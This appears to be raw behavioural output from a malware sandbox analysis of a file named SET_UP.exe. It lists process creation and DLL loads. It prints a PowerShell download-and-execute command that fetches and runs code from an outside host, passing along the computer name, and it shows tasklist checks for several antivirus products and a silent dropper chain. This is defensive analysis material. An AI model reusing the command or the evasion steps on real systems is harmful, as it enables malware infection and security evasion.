            Source: C:\Users\user\Desktop\SET_UP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SET_UP.exeProcess created: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe "C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe"
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exeProcess created: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp "C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp" /SL5="$F0298,7785838,845824,C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess created: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe "C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe" /VERYSILENT
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exeProcess created: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp "C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp" /SL5="$30470,7785838,845824,C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe" /VERYSILENT
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9
            Source: C:\Windows\System32\timeout.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
            Source: C:\Users\user\Desktop\SET_UP.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{Jump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeProcess created: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe "C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exeProcess created: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp "C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp" /SL5="$F0298,7785838,845824,C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess created: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe "C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe" /VERYSILENTJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exeProcess created: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp "C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp" /SL5="$30470,7785838,845824,C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe" /VERYSILENTJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9 Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SET_UP.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: winsta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: winsta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmpSection loaded: ntmarta.dllJump to behavior
